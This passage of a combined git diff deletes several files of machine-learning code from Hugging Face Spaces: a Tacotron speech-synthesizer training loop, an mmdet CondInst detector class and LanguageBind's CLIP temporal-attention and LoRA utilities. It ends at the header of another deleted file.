optimizer - optimizer = optim.Adam(model.parameters()) - - # Load the weights - if force_restart or not weights_fpath.exists(): - print("\nStarting the training of Tacotron from scratch\n") - model.save(weights_fpath) - - # Embeddings metadata - char_embedding_fpath = meta_folder.joinpath("CharacterEmbeddings.tsv") - with open(char_embedding_fpath, "w", encoding="utf-8") as f: - for symbol in symbols: - if symbol == " ": - symbol = "\\s" # For visual purposes, swap space with \s - - f.write("{}\n".format(symbol)) - - else: - print("\nLoading weights at %s" % weights_fpath) - model.load(weights_fpath, optimizer) - print("Tacotron weights loaded from step %d" % model.step) - - # Initialize the dataset - metadata_fpath = syn_dir.joinpath("train.txt") - mel_dir = syn_dir.joinpath("mels") - embed_dir = syn_dir.joinpath("embeds") - dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams) - - for i, session in enumerate(hparams.tts_schedule): - current_step = model.get_step() - - r, lr, max_step, batch_size = session - - training_steps = max_step - current_step - - # Do we need to change to the next session? - if current_step >= max_step: - # Are there no further sessions than the current one? - if i == len(hparams.tts_schedule) - 1: - # We have completed training. Save the model and exit - model.save(weights_fpath, optimizer) - break - else: - # There is a following session, go to it - continue - - model.r = r - - # Begin the training - simple_table([(f"Steps with r={r}", str(training_steps // 1000) + "k Steps"), - ("Batch Size", batch_size), - ("Learning Rate", lr), - ("Outputs/Step (r)", model.r)]) - - for p in optimizer.param_groups: - p["lr"] = lr - - collate_fn = partial(collate_synthesizer, r=r, hparams=hparams) - data_loader = DataLoader(dataset, batch_size, shuffle=True, num_workers=2, collate_fn=collate_fn) - - total_iters = len(dataset) - steps_per_epoch = np.ceil(total_iters / batch_size).astype(np.int32) - epochs = np.ceil(training_steps / steps_per_epoch).astype(np.int32) - - for epoch in range(1, epochs+1): - for i, (texts, mels, embeds, idx) in enumerate(data_loader, 1): - start_time = time.time() - - # Generate stop tokens for training - stop = torch.ones(mels.shape[0], mels.shape[2]) - for j, k in enumerate(idx): - stop[j, :int(dataset.metadata[k][4])-1] = 0 - - texts = texts.to(device) - mels = mels.to(device) - embeds = embeds.to(device) - stop = stop.to(device) - - # Forward pass - # Parallelize model onto GPUS using workaround due to python bug - if device.type == "cuda" and torch.cuda.device_count() > 1: - m1_hat, m2_hat, attention, stop_pred = data_parallel_workaround(model, texts, mels, embeds) - else: - m1_hat, m2_hat, attention, stop_pred = model(texts, mels, embeds) - - # Backward pass - m1_loss = F.mse_loss(m1_hat, mels) + F.l1_loss(m1_hat, mels) - m2_loss = F.mse_loss(m2_hat, mels) - stop_loss = F.binary_cross_entropy(stop_pred, stop) - - loss = m1_loss + m2_loss + stop_loss - - optimizer.zero_grad() - loss.backward() - - if hparams.tts_clip_grad_norm is not None: - grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hparams.tts_clip_grad_norm) - if np.isnan(grad_norm.cpu()): - print("grad_norm was NaN!") - - optimizer.step() - - time_window.append(time.time() - start_time) - loss_window.append(loss.item()) - - step = model.get_step() - k = step // 1000 - - msg = f"| Epoch: {epoch}/{epochs} ({i}/{steps_per_epoch}) | Loss: {loss_window.average:#.4} | " \ - f"{1./time_window.average:#.2} steps/s | Step: {k}k | " - stream(msg) - - # Backup or save model as appropriate - if backup_every != 0 and step % backup_every == 0 : - backup_fpath = weights_fpath.parent / f"synthesizer_{k:06d}.pt" - model.save(backup_fpath, optimizer) - - if save_every != 0 and step % save_every == 0 : - # Must save latest optimizer state to ensure that resuming training - # doesn't produce artifacts - model.save(weights_fpath, optimizer) - - # Evaluate model to generate samples - epoch_eval = hparams.tts_eval_interval == -1 and i == steps_per_epoch # If epoch is done - step_eval = hparams.tts_eval_interval > 0 and step % hparams.tts_eval_interval == 0 # Every N steps - if epoch_eval or step_eval: - for sample_idx in range(hparams.tts_eval_num_samples): - # At most, generate samples equal to number in the batch - if sample_idx + 1 <= len(texts): - # Remove padding from mels using frame length in metadata - mel_length = int(dataset.metadata[idx[sample_idx]][4]) - mel_prediction = np_now(m2_hat[sample_idx]).T[:mel_length] - target_spectrogram = np_now(mels[sample_idx]).T[:mel_length] - attention_len = mel_length // model.r - - eval_model(attention=np_now(attention[sample_idx][:, :attention_len]), - mel_prediction=mel_prediction, - target_spectrogram=target_spectrogram, - input_seq=np_now(texts[sample_idx]), - step=step, - plot_dir=plot_dir, - mel_output_dir=mel_output_dir, - wav_dir=wav_dir, - sample_num=sample_idx + 1, - loss=loss, - hparams=hparams) - - # Break out of loop to update training schedule - if step >= max_step: - break - - # Add line break after every epoch - print("") - - -def eval_model(attention, mel_prediction, target_spectrogram, input_seq, step, - plot_dir, mel_output_dir, wav_dir, sample_num, loss, hparams): - # Save some results for evaluation - attention_path = str(plot_dir.joinpath("attention_step_{}_sample_{}".format(step, sample_num))) - save_attention(attention, attention_path) - - # save predicted mel spectrogram to disk (debug) - mel_output_fpath = mel_output_dir.joinpath("mel-prediction-step-{}_sample_{}.npy".format(step, sample_num)) - np.save(str(mel_output_fpath), mel_prediction, allow_pickle=False) - - # save griffin lim inverted wav for debug (mel -> wav) - wav = audio.inv_mel_spectrogram(mel_prediction.T, hparams) - wav_fpath = wav_dir.joinpath("step-{}-wave-from-mel_sample_{}.wav".format(step, sample_num)) - audio.save_wav(wav, str(wav_fpath), sr=hparams.sample_rate) - - # save real and predicted mel-spectrogram plot to disk (control purposes) - spec_fpath = plot_dir.joinpath("step-{}-mel-spectrogram_sample_{}.png".format(step, sample_num)) - title_str = "{}, {}, step={}, loss={:.5f}".format("Tacotron", time_string(), step, loss) - plot_spectrogram(mel_prediction, str(spec_fpath), title=title_str, - target_spectrogram=target_spectrogram, - max_len=target_spectrogram.size // hparams.num_mels) - print("Input at step {}: {}".format(step, sequence_to_text(input_seq))) diff --git a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/condinst.py b/spaces/KyanChen/RSPrompter/mmdet/models/detectors/condinst.py deleted file mode 100644 index ed2dc99eea3faf7b03a3970d46a372d28eb89fe1..0000000000000000000000000000000000000000 --- a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/condinst.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from mmdet.registry import MODELS -from mmdet.utils import ConfigType, OptConfigType, OptMultiConfig -from .single_stage_instance_seg import SingleStageInstanceSegmentor - - -@MODELS.register_module() -class CondInst(SingleStageInstanceSegmentor): - """Implementation of `CondInst `_""" - - def __init__(self, - backbone: ConfigType, - neck: ConfigType, - bbox_head: ConfigType, - mask_head: ConfigType, - train_cfg: OptConfigType = None, - test_cfg: OptConfigType = None, - data_preprocessor: OptConfigType = None, - init_cfg: OptMultiConfig = None) -> None: - super().__init__( - backbone=backbone, - neck=neck, - bbox_head=bbox_head, - mask_head=mask_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - data_preprocessor=data_preprocessor, - init_cfg=init_cfg) diff --git a/spaces/KyanChen/RSPrompter/mmpl/__init__.py b/spaces/KyanChen/RSPrompter/mmpl/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/LanguageBind/LanguageBind/model/process_clip.py b/spaces/LanguageBind/LanguageBind/model/process_clip.py deleted file mode 100644 index a4956a852ccbfc705a322c15f1950cf2dceb86a5..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/model/process_clip.py +++ /dev/null @@ -1,639 +0,0 @@ -import logging -import math -from typing import Optional, Tuple -from einops import rearrange -from peft import LoraConfig, get_peft_model -from transformers import CLIPConfig -from transformers.models.clip.modeling_clip import CLIPEncoderLayer as SpatialCLIPEncoderLayer, CLIPAttention, CLIPMLP -import torch -from torch import nn -from torch.nn import functional as F - -from training.distributed import is_master - -aaa = {'NUM_FRAMES': 1, 'PATCH_DROPOUT': 0.0} - -def set_global_value(k, v): - global aaa - aaa[k] = v - -def get_global_value(): - global aaa - return aaa - -# @dataclass -# class CLIPVisionCfg: -# layers: Union[Tuple[int, int, int, int], int] = 12 -# width: int = 768 -# head_width: int = 64 -# mlp_ratio: float = 4.0 -# patch_size: int = 16 -# image_size: Union[Tuple[int, int], int] = 224 -# cast_dtype: str = None -# num_frames: int = 2 -# -# ls_init_value: Optional[float] = None # layer scale initial value -# patch_dropout: float = 0. # what fraction of patches to dropout during training (0 would mean disabled and no patches dropped) - 0.5 to 0.75 recommended in the paper for optimal results -# input_patchnorm: bool = False # whether to use dual patchnorm - would only apply the input layernorm on each patch, as post-layernorm already exist in original clip vit design -# global_average_pool: bool = False # whether to global average pool the last embedding layer, instead of using CLS token (https://arxiv.org/abs/2205.01580) -# attentional_pool: bool = False # whether to use attentional pooler in the last embedding layer -# n_queries: int = 256 # n_queries for attentional pooler -# attn_pooler_heads: int = 8 # n heads for attentional_pooling -# output_tokens: bool = False -# -# timm_model_name: str = None # a valid model name overrides layers, width, patch_size -# timm_model_pretrained: bool = False # use (imagenet) pretrained weights for named model -# timm_pool: str = 'avg' # feature pooling for timm model ('abs_attn', 'rot_attn', 'avg', '') -# timm_proj: str = 'linear' # linear projection for timm model output ('linear', 'mlp', '') -# timm_proj_bias: bool = False # enable bias final projection -# timm_drop: float = 0. # head dropout -# timm_drop_path: Optional[float] = None # backbone stochastic depth - -# class Video_VisionTransformer(nn.Module): -# output_tokens: torch.jit.Final[bool] -# -# def __init__( -# self, -# num_frames: int, -# image_size: int, -# patch_size: int, -# width: int, -# layers: int, -# heads: int, -# mlp_ratio: float, -# ls_init_value: float = None, -# global_average_pool: bool = False, -# attentional_pool: bool = False, -# n_queries: int = 256, -# attn_pooler_heads: int = 8, -# output_dim: int = 512, -# patch_dropout: float = 0., -# input_patchnorm: bool = False, -# act_layer: Callable = nn.GELU, -# norm_layer: Callable = LayerNorm, -# output_tokens: bool = False -# ): -# super().__init__() -# self.output_tokens = output_tokens -# image_height, image_width = self.image_size = to_2tuple(image_size) -# patch_height, patch_width = self.patch_size = to_2tuple(patch_size) -# self.grid_size = (image_height // patch_height, image_width // patch_width) -# self.output_dim = output_dim -# -# # whether to layernorm each patch, as done in dual patchnorm paper - https://arxiv.org/abs/2302.01327v1 -# self.input_patchnorm = input_patchnorm -# -# if input_patchnorm: -# patch_input_dim = patch_height * patch_width * 3 -# self.patchnorm_pre_ln = LayerNorm(patch_input_dim) -# self.conv1 = nn.Linear(patch_input_dim, width) -# else: -# self.patchnorm_pre_ln = nn.Identity() -# self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, -# bias=False) -# -# # class embeddings and positional embeddings -# self.scale = scale = width ** -0.5 -# self.class_embedding = nn.Parameter(scale * torch.randn(width)) -# self.positional_embedding = nn.Parameter(scale * torch.randn(self.grid_size[0] * self.grid_size[1] + 1, width)) -# -# self.temporal_embedding = nn.Parameter(torch.zeros(1, num_frames, width)) -# # setting a patch_dropout of 0. would mean it is disabled and this function would be the identity fn -# self.patch_dropout = PatchDropout(patch_dropout) if patch_dropout > 0. else nn.Identity() -# -# self.ln_pre = norm_layer(width) -# self.transformer = Transformer( -# width, -# layers, -# heads, -# mlp_ratio, -# ls_init_value=ls_init_value, -# act_layer=act_layer, -# norm_layer=norm_layer, -# ) -# -# self.global_average_pool = global_average_pool -# if attentional_pool: -# self.attn_pool = AttentionalPooler(output_dim, width, n_head=attn_pooler_heads, n_queries=n_queries) -# self.ln_post = norm_layer(output_dim) -# self.proj = nn.Parameter(scale * torch.randn(output_dim, output_dim)) -# else: -# self.attn_pool = None -# self.ln_post = norm_layer(width) -# self.proj = nn.Parameter(scale * torch.randn(width, output_dim)) -# -# self.init_parameters() -# -# -# def lock(self, unlocked_groups=0, freeze_bn_stats=False): -# for param in self.parameters(): -# param.requires_grad = False -# -# if unlocked_groups != 0: -# groups = [ -# [ -# self.conv1, -# self.positional_embedding, -# self.ln_pre, -# ], -# *zip(self.transformer.resblocks[:-1], [self.class_embedding for i in range(len(self.transformer.resblocks[:-1]))]), -# [ -# self.class_embedding, -# self.transformer.resblocks[-1], -# self.ln_post, -# ], -# [self.proj, self.temporal_embedding] -# ] -# -# def _unlock(x): -# if isinstance(x, Sequence): -# for g in x: -# _unlock(g) -# else: -# if isinstance(x, torch.nn.Parameter): -# x.requires_grad = True -# else: -# for p in x.parameters(): -# p.requires_grad = True -# -# _unlock(groups[-unlocked_groups:]) -# -# def init_parameters(self): -# # FIXME OpenAI CLIP did not define an init for the VisualTransformer -# # TODO experiment if default PyTorch init, below, or alternate init is best. -# -# nn.init.normal_(self.temporal_embedding, std=self.scale) -# # nn.init.normal_(self.class_embedding, std=self.scale) -# # nn.init.normal_(self.positional_embedding, std=self.scale) -# # -# # proj_std = (self.transformer.width ** -0.5) * ((2 * self.transformer.layers) ** -0.5) -# # attn_std = self.transformer.width ** -0.5 -# # fc_std = (2 * self.transformer.width) ** -0.5 -# # for block in self.transformer.resblocks: -# # nn.init.normal_(block.attn.in_proj_weight, std=attn_std) -# # nn.init.normal_(block.attn.out_proj.weight, std=proj_std) -# # nn.init.normal_(block.mlp.c_fc.weight, std=fc_std) -# # nn.init.normal_(block.mlp.c_proj.weight, std=proj_std) -# # -# # if self.text_projection is not None: -# # nn.init.normal_(self.text_projection, std=self.scale) -# # pass -# -# @torch.jit.ignore -# def set_grad_checkpointing(self, enable=True): -# self.transformer.grad_checkpointing = enable -# -# def _global_pool(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: -# if self.global_average_pool: -# return x.mean(dim=1), x -# else: -# return x[:, 0], x[:, 1:] -# -# def forward(self, x: torch.Tensor): -# # print('input img', x.shape) -# B, _, T, _, _ = x.shape -# x = rearrange(x, 'b c t h w -> (b t) c h w') -# # to patches - whether to use dual patchnorm - https://arxiv.org/abs/2302.01327v1 -# if self.input_patchnorm: -# # einops - rearrange(x, 'b c (h p1) (w p2) -> b (h w) (c p1 p2)') -# x = x.reshape(x.shape[0], x.shape[1], self.grid_size[0], self.patch_size[0], self.grid_size[1], -# self.patch_size[1]) -# x = x.permute(0, 2, 4, 1, 3, 5) -# x = x.reshape(x.shape[0], self.grid_size[0] * self.grid_size[1], -1) -# x = self.patchnorm_pre_ln(x) -# x = self.conv1(x) -# else: -# x = self.conv1(x) # shape = [*, width, grid, grid] -# x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid ** 2] -# x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width] -# -# # print('embed img', x.shape) -# # class embeddings and positional embeddings -# x = torch.cat( -# [self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), -# x], dim=1) # shape = [*, grid ** 2 + 1, width] -# x = x + self.positional_embedding.to(x.dtype) -# -# n = x.shape[1] -# x = rearrange(x, '(b t) n d -> (b n) t d', t=T) -# x = x + self.temporal_embedding[:, :T, :] -# x = rearrange(x, '(b n) t d -> (b t) n d', n=n) -# -# # a patch_dropout of 0. would mean it is disabled and this function would do nothing but return what was passed in -# x = self.patch_dropout(x) -# x = self.ln_pre(x) -# -# # print('patch_dropout img', x.shape) -# x = x.permute(1, 0, 2) # NLD -> LND -# # print('permute img', x.shape) -# x = self.transformer(x) -# x = x.permute(1, 0, 2) # LND -> NLD -# -# if self.attn_pool is not None: -# x = self.attn_pool(x) -# x = self.ln_post(x) -# pooled, tokens = self._global_pool(x) -# else: -# pooled, tokens = self._global_pool(x) -# pooled = self.ln_post(pooled) # bt, d -# -# pooled = pooled.reshape(B, T, -1).mean(1) -# if self.proj is not None: -# pooled = pooled @ self.proj -# -# if self.output_tokens: -# return pooled, tokens -# -# return pooled -# -# def _build_vision_tower( -# embed_dim: int, -# vision_cfg: CLIPVisionCfg, -# quick_gelu: bool = False, -# cast_dtype: Optional[torch.dtype] = None -# ): -# if isinstance(vision_cfg, dict): -# vision_cfg = CLIPVisionCfg(**vision_cfg) -# -# # OpenAI models are pretrained w/ QuickGELU but native nn.GELU is both faster and more -# # memory efficient in recent PyTorch releases (>= 1.10). -# # NOTE: timm models always use native GELU regardless of quick_gelu flag. -# act_layer = QuickGELU if quick_gelu else nn.GELU -# -# vision_heads = vision_cfg.width // vision_cfg.head_width -# norm_layer = LayerNormFp32 if cast_dtype in (torch.float16, torch.bfloat16) else LayerNorm -# visual = Video_VisionTransformer( -# num_frames=vision_cfg.num_frames, -# image_size=vision_cfg.image_size, -# patch_size=vision_cfg.patch_size, -# width=vision_cfg.width, -# layers=vision_cfg.layers, -# heads=vision_heads, -# mlp_ratio=vision_cfg.mlp_ratio, -# ls_init_value=vision_cfg.ls_init_value, -# patch_dropout=vision_cfg.patch_dropout, -# input_patchnorm=vision_cfg.input_patchnorm, -# global_average_pool=vision_cfg.global_average_pool, -# attentional_pool=vision_cfg.attentional_pool, -# n_queries=vision_cfg.n_queries, -# attn_pooler_heads=vision_cfg.attn_pooler_heads, -# output_tokens=vision_cfg.output_tokens, -# output_dim=embed_dim, -# act_layer=act_layer, -# norm_layer=norm_layer, -# ) -# -# return visual - - - - -class CLIPEncoderLayer(SpatialCLIPEncoderLayer): - def __init__(self, config: CLIPConfig): - super().__init__(config) - self.temporal_embedding = nn.Parameter(torch.zeros(1, config.num_frames, config.hidden_size)) - nn.init.normal_(self.temporal_embedding, std=config.hidden_size ** -0.5) - - self.embed_dim = config.hidden_size - self.temporal_attn = CLIPAttention(config) - self.temporal_mlp = CLIPMLP(config) - # self.t_attn_gate = nn.Parameter(torch.tensor([-20.])) - # self.t_ffn_gate = nn.Parameter(torch.tensor([-20.])) - self.temporal_layer_norm1 = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_eps) - self.temporal_layer_norm2 = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_eps) - - def forward( - self, - hidden_states: torch.Tensor, - attention_mask: torch.Tensor, - causal_attention_mask: torch.Tensor, - output_attentions: Optional[bool] = False, - ) -> Tuple[torch.FloatTensor]: - """ - Args: - hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)` - attention_mask (`torch.FloatTensor`): attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - `(config.encoder_attention_heads,)`. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - """ - - - bt, n, d = hidden_states.shape - t = get_global_value()['NUM_FRAMES'] - - - # time embed - if t != 1: - n = hidden_states.shape[1] - hidden_states = rearrange(hidden_states, '(b t) n d -> (b n) t d', t=t) - hidden_states = hidden_states + self.temporal_embedding[:, :t, :] - hidden_states = rearrange(hidden_states, '(b n) t d -> (b t) n d', n=n) - - # time attn - residual = hidden_states - hidden_states = rearrange(hidden_states, '(b t) n d -> (b n) t d', t=t) - # hidden_states = self.layer_norm1(hidden_states) # share layernorm - hidden_states = self.temporal_layer_norm1(hidden_states) - hidden_states, attn_weights = self.temporal_attn( - hidden_states=hidden_states, - attention_mask=attention_mask, - causal_attention_mask=causal_attention_mask, - output_attentions=output_attentions, - ) - hidden_states = residual + rearrange(hidden_states, '(b n) t d -> (b t) n d', n=n) - - residual = hidden_states - hidden_states = rearrange(hidden_states, '(b t) n d -> (b n) t d', t=t) - # hidden_states = self.layer_norm2(hidden_states) # share layernorm - hidden_states = self.temporal_layer_norm2(hidden_states) - hidden_states = self.temporal_mlp(hidden_states) - hidden_states = residual + rearrange(hidden_states, '(b n) t d -> (b t) n d', n=n) - - # spatial attn - residual = hidden_states - - hidden_states = self.layer_norm1(hidden_states) - hidden_states, attn_weights = self.self_attn( - hidden_states=hidden_states, - attention_mask=attention_mask, - causal_attention_mask=causal_attention_mask, - output_attentions=output_attentions, - ) - hidden_states = residual + hidden_states - - residual = hidden_states - hidden_states = self.layer_norm2(hidden_states) - hidden_states = self.mlp(hidden_states) - hidden_states = residual + hidden_states - - outputs = (hidden_states,) - - if output_attentions: - outputs += (attn_weights,) - - return outputs - - - - -# class ResidualAttentionBlock(SpatialResidualAttentionBlock): -# def __init__(self, -# num_frames: int, -# d_model: int, -# n_head: int, -# mlp_ratio: float = 4.0, -# ls_init_value: float = None, -# act_layer: Callable = nn.GELU, -# norm_layer: Callable = LayerNorm, -# is_cross_attention: bool = False,): -# super().__init__(d_model, n_head, mlp_ratio, ls_init_value, act_layer, norm_layer, is_cross_attention) -# -# self.num_frames = num_frames -# self.time_ln_1 = norm_layer(d_model) -# self.time_attn = nn.MultiheadAttention(d_model, n_head) -# self.time_ls_1 = LayerScale(d_model, ls_init_value) if ls_init_value is not None else nn.Identity() -# -# def time_attention( -# self, -# q_x: torch.Tensor, -# k_x: Optional[torch.Tensor] = None, -# v_x: Optional[torch.Tensor] = None, -# attn_mask: Optional[torch.Tensor] = None, -# ): -# k_x = k_x if k_x is not None else q_x -# v_x = v_x if v_x is not None else q_x -# -# attn_mask = attn_mask.to(q_x.dtype) if attn_mask is not None else None -# return self.time_attn( -# q_x, k_x, v_x, need_weights=True, attn_mask=attn_mask -# )[0] -# -# def forward( -# self, -# q_x: torch.Tensor, -# k_x: Optional[torch.Tensor] = None, -# v_x: Optional[torch.Tensor] = None, -# attn_mask: Optional[torch.Tensor] = None, -# ): -# k_x = self.ln_1_kv(k_x) if hasattr(self, "ln_1_kv") and k_x is not None else None -# v_x = self.ln_1_kv(v_x) if hasattr(self, "ln_1_kv") and v_x is not None else None -# -# n, bt, d = q_x.shape -# t = get_global_value()['NUM_FRAMES'] -# -# # time attn -# # print('q_x', q_x.shape) -# xt = rearrange(q_x, 'n (b t) d -> t (b n) d', t=t) -# # print('xt', xt.shape) -# xt = self.time_ls_1(self.time_attention(q_x=self.time_ln_1(xt), k_x=None, v_x=None, attn_mask=None)) -# # print('time_attention xt', xt.shape) -# q_x = q_x + rearrange(xt, 't (b n) d -> n (b t) d', n=n) -# # print('time_attention q_x', xt.shape) -# -# # spatial attn -# x = q_x + self.ls_1(self.attention(q_x=self.ln_1(q_x), k_x=k_x, v_x=v_x, attn_mask=attn_mask)) -# -# x = x + self.ls_2(self.mlp(self.ln_2(x))) -# return x - -def print_trainable_parameters(model, msg=''): - """ - Prints the number of trainable parameters in the model. - """ - trainable_params = 0 - all_param = 0 - for _, param in model.named_parameters(): - all_param += param.numel() - if param.requires_grad: - trainable_params += param.numel() - logging.info(f"{msg} Trainable params: {trainable_params} || all params: {all_param} || " - f"trainable: {100 * trainable_params / all_param:.2f}%") - -def convert_model_to_lora(args, model): - if args.clip_type == 'vl' and args.add_time_attn: - target_modules = ["temporal_attn.k_proj", "temporal_attn.v_proj", - "temporal_attn.q_proj", "temporal_attn.out_proj", - "temporal_mlp.fc1", "temporal_mlp.fc2"] - else: - target_modules = ["k_proj", "v_proj", "q_proj", "out_proj"] - config = LoraConfig( - r=args.lora_r, # 16 - lora_alpha=args.lora_alpha, # 16 - target_modules=target_modules, # self_attn.out_proj - lora_dropout=args.lora_dropout, # 0.1 - bias="none", - modules_to_save=[], - ) - model.vision_model.encoder.is_gradient_checkpointing = False - model.vision_model.encoder = get_peft_model(model.vision_model.encoder, config) - if is_master(args): - print_trainable_parameters(model.vision_model.encoder, msg='The model.vision_model.encoder: ') - # model.text_model.encoder.is_gradient_checkpointing = False - # model.text_model.encoder = get_peft_model(model.text_model.encoder, config) - # if is_master(args): - # print_trainable_parameters(model.text_model.encoder, msg='The model.text_model.encoder: ') - - - -def add_time_attn_block(m: nn.ModuleList, device): - config = m.config - for i, sub_m in enumerate(m.layers): - if isinstance(sub_m, SpatialCLIPEncoderLayer): - oup = CLIPEncoderLayer(config).to(device) - state_dict = sub_m.state_dict() - - new_state_dict = {} - for k, v in state_dict.items(): - if 'self_attn' in k: - new_state_dict[k] = v - # if 'out_proj' in k: - # v = torch.zeros_like(v, dtype=v.dtype, device=v.device) - new_k = 'temporal_attn.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - elif 'mlp' in k: - new_state_dict[k] = v - # if 'out_proj' in k: - # v = torch.zeros_like(v, dtype=v.dtype, device=v.device) - new_k = 'temporal_mlp.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - elif 'layer_norm1' in k: - new_state_dict[k] = v - new_k = 'temporal_layer_norm1.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - elif 'layer_norm2' in k: - new_state_dict[k] = v - new_k = 'temporal_layer_norm2.' + '.'.join(k.split('.')[1:]) - new_state_dict[new_k] = v - else: - new_state_dict[k] = v - - missing_keys, unexpected_keys = oup.load_state_dict(new_state_dict, strict=False) - # assert missing_keys == ["t_attn_gate", "t_ffn_gate"] - assert missing_keys == ['temporal_embedding'] - assert unexpected_keys == [] - m.layers[i] = oup - -def resize_pos(m: nn.Module, args): - # convert embedding - if args.clip_type == 'al': - m.image_size = [args.num_mel_bins, args.target_length] - m.config.image_size = [m.image_size, m.image_size] if isinstance(m.image_size, int) else m.image_size - - # m.config.num_channels = 1 - # new_patch_embedding = nn.Conv2d( - # in_channels=m.config.num_channels, - # out_channels=m.embed_dim, - # kernel_size=m.patch_size, - # stride=m.patch_size, - # bias=False, - # ) - # state_dict = m.patch_embedding.state_dict() - # for k, v in state_dict.items(): - # state_dict[k] = torch.mean(v, dim=1, keepdim=True).to(v.dtype) - # m.patch_embedding = new_patch_embedding - # m.patch_embedding.load_state_dict(state_dict) - - # pos resize - old_pos_embed_state_dict = m.position_embedding.state_dict() - old_pos_embed = old_pos_embed_state_dict['weight'] - dtype = old_pos_embed.dtype - grid_size = [m.config.image_size[0] // m.patch_size, m.config.image_size[1] // m.patch_size] - extra_tokens = 1 # FIXME detect different token configs (ie no class token, or more) - new_seq_len = grid_size[0] * grid_size[1] + extra_tokens - if new_seq_len == old_pos_embed.shape[0]: - m.to(args.device) - return - - m.num_patches = grid_size[0] * grid_size[1] - m.num_positions = m.num_patches + 1 - m.register_buffer("position_ids", torch.arange(m.num_positions).expand((1, -1))) - new_position_embedding = nn.Embedding(m.num_positions, m.embed_dim) - - if extra_tokens: - pos_emb_tok, pos_emb_img = old_pos_embed[:extra_tokens], old_pos_embed[extra_tokens:] - else: - pos_emb_tok, pos_emb_img = None, old_pos_embed - old_grid_size = [int(math.sqrt(len(pos_emb_img)))]*2 - - if is_master(args): - logging.info('Resizing position embedding grid-size from %s to %s', old_grid_size, grid_size) - pos_emb_img = pos_emb_img.reshape(1, old_grid_size[0], old_grid_size[1], -1).permute(0, 3, 1, 2) - pos_emb_img = F.interpolate( - pos_emb_img, - size=grid_size, - mode='bicubic', - antialias=True, - align_corners=False, - ) - pos_emb_img = pos_emb_img.permute(0, 2, 3, 1).reshape(1, grid_size[0] * grid_size[1], -1)[0] - if pos_emb_tok is not None: - new_pos_embed = torch.cat([pos_emb_tok, pos_emb_img], dim=0) - else: - new_pos_embed = pos_emb_img - old_pos_embed_state_dict['weight'] = new_pos_embed.to(dtype) - m.position_embedding = new_position_embedding - m.position_embedding.load_state_dict(old_pos_embed_state_dict) - - m.to(args.device) - - -# def i2v_linear_resize_pos_embed(state_dict, model, interpolation: str = 'linear', antialias: bool = True): -# # Rescale the grid of position embeddings when loading from state_dict -# old_pos_embed = state_dict.get('visual.positional_embedding', None) -# if old_pos_embed is None or not hasattr(model.visual, 'grid_size'): -# return -# # grid_size = to_2tuple(model.visual.grid_size) -# grid_size = model.visual.grid_size -# extra_tokens = 1 # FIXME detect different token configs (ie no class token, or more) -# # new_seq_len = grid_size[0] * grid_size[1] + extra_tokens -# new_seq_len = grid_size[0] * grid_size[1] * grid_size[2] + extra_tokens -# if new_seq_len == old_pos_embed.shape[0]: -# return -# -# if extra_tokens: -# pos_emb_tok, pos_emb_img = old_pos_embed[:extra_tokens], old_pos_embed[extra_tokens:] -# else: -# pos_emb_tok, pos_emb_img = None, old_pos_embed -# # old_grid_size = to_2tuple(int(math.sqrt(len(pos_emb_img)))) -# -# logging.info('Resizing position embedding grid-size from %s to %s', old_pos_embed.shape[0], new_seq_len) -# # pos_emb_img = pos_emb_img.reshape(1, old_grid_size[0], old_grid_size[1], -1).permute(0, 3, 1, 2) -# pos_emb_img = pos_emb_img.unsqueeze(0).permute(0, 2, 1) -# pos_emb_img = F.interpolate( -# pos_emb_img, -# # size=grid_size, -# size=new_seq_len - extra_tokens, -# mode=interpolation, -# # antialias=antialias, -# # align_corners=False, -# ) -# # pos_emb_img = pos_emb_img.permute(0, 2, 3, 1).reshape(1, grid_size[0] * grid_size[1], -1)[0] -# pos_emb_img = pos_emb_img.permute(0, 2, 1)[0] -# if pos_emb_tok is not None: -# new_pos_embed = torch.cat([pos_emb_tok, pos_emb_img], dim=0) -# else: -# new_pos_embed = pos_emb_img -# state_dict['visual.positional_embedding'] = new_pos_embed -# -# def inflate_patch_embed(state_dict, model): -# old_patch_embed_shape = model.visual.conv1.weight.shape -# new_patch_embed_shape = state_dict['visual.conv1.weight'].shape -# if old_patch_embed_shape == new_patch_embed_shape: -# return -# expanded_weight = state_dict['visual.conv1.weight'].unsqueeze(2).repeat(1, 1, 2, 1, 1) -# state_dict['visual.conv1.weight'] = expanded_weight -# -# -# def load_checkpoint(model, pretrained, strict=True): -# state_dict = load_state_dict(pretrained) -# # detect old format and make compatible with new format -# if 'positional_embedding' in state_dict and not hasattr(model, 'positional_embedding'): -# state_dict = convert_to_custom_text_state_dict(state_dict) -# i2v_linear_resize_pos_embed(state_dict, model) -# inflate_patch_embed(state_dict, model) -# incompatible_keys = model.load_state_dict(state_dict, strict=strict) -# return incompatible_keys - diff --git a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/nets_123821KB.py b/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/nets_123821KB.py deleted file mode 100644 index 